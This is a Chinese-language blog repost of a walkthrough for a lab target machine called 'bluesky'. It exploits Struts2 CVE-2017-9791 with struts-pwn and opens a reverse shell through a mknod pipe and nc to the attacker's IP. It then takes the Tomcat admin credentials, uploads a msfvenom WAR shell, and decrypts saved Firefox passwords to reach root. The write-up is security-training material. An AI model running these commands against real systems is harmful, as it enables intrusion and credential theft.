2021-03-25

90 阅读 0 评论 60 点赞

我是靠谱客的博主寂寞爆米花，最近开发中收集的这篇文章主要介绍2021-03-25，觉得挺不错的，现在分享给大家，希望可以做个参考。

概述

bluesky
内网靶机
kali机 192.168.38.128
靶机 192.168.38.135

nmap -sS -sV 192.168.38.135
开启了22端口与8080端口
OpenSSH 7.2p2
OpenSSH 是 SSH （Secure SHell）协议的免费开源实现。SSH协议族可以用来进行远程控制，或在计算机之间传送文件。而实现此功能的传统方式，如telnet(终端仿真协议)、 rcp ftp、 rlogin、rsh都是极为不安全的，并且会使用明文传送密码。OpenSSH提供了服务端后台程序和客户端工具，用来加密远程控制和文件传输过程中的数据，并由此来代替原来的类似服务。自从openssh的版本2.9以来，默认的协议是版本2，该协议默认使用RSA钥匙
Apache Tomcat 9.0.40
Apache是普通服务器，本身支支持html即普通网页。不过可以通过插件支持php，还可以与Tomact连通(单向连接)。Apache只支持静态网页，但像php，cgi，jsp等动态网页就需要Tomact来处理

这个漏洞是Struts2漏洞 CVE-2017-9791(远程代码执行漏洞)
Struts2是一个基于MVC设计模式的Web应用框架，它本质上相当于一个servlet(运行在Web服务器活应用服务器上的程序，它作为web浏览器或其他Http客户端的请求和HTTP服务器上的数据库活应用程序之间的中间层)，在MVC设计模式中，Struts2作为控制器来建立模型与视图的数据交互。
/struts2-showcase/index.action #漏洞路径

POC： git clone https://github.com/mazen160/struts-pwn.git

漏洞利用

python struts-pwn.py --url "http://192.168.38.135:8080/struts2-showcase/index.action" -c "id"

弹shell
mknod 用法
mknod [options] name {bc} major minor
mknod [options] name p
GNU (GNU's Not Unix) 一个自由的操作系统
GNU选项 [-m mode] [--help] [--version] [--]
描述 mknod用指定名称产生一个FIFO(命名管道)，字符专用或块专用文件。
b 创造一个块文件(有缓存)
c 创造一个字符文件(无缓存)
p 产生一个FIFO

mknod /tmp/x p 产生一个姓名为x的管道
然后反弹shell
kali nc -lvp 4444 # 监听4444端口

靶机 python struts-pwn.py --url "http://192.168.38.135:8080/struts2-showcase/index.action" -c "/bin/sh 0</tmp/x | nc 192.168.38.128 4444 1>/tmp/x"
#/bin/sh Unix shell
#1/0 (input/output)
#/bin/sh 0</tmp/x 从管道/tmp/x输出一个shell
#nc ip port 1>/tmp/x nc连接kali从管道/tmp/x输入

进去之后可以利用python3 -c 'import pty;pty.spawn("/bin/bash")' 生成一个交互式shell
我们获取到shell之后，ls会看到有一个user.txt 这时候我们就完成了第一个挑战

中间件是tomcat，所以我们可以去找web后台密码
tomcat路径为/usr/local/tomcat
在conf/tomcat-users.xml 我们可以获取web后台账户与密码
username="admin" password="6mzf3>gfZ.pN8_Mp"

后台页面寻找到一处上传点可以传war文件
msfvenom生成大马

msfvenom -p java_shell_reverse_tcp LHOST=192.168.38.128 LPORT=4444 -f war -o shell.war

然后nc监听也可以获取shell

mozilla firefox 信息收集我用命令找不着
用户根目录下有mozilla firefox浏览器隐藏文件
找到firefox保存密码记录 firefox浏览器存储用户名密码的文件是logins.json或signons.sqlite 使用locate找位置
使用脚本解密

git clone https://github.com/lclevy/firepwd.git

需要logins.json与key4.db or key3.db
python3 -m http.server 8001 python3简单web服务然后下载
运行firepwd.py 可以得到用户的ssh密码
然后切换成root 会在根目录得到第二个标记

参考链接 https://www.freebuf.com/articles/web/261451.html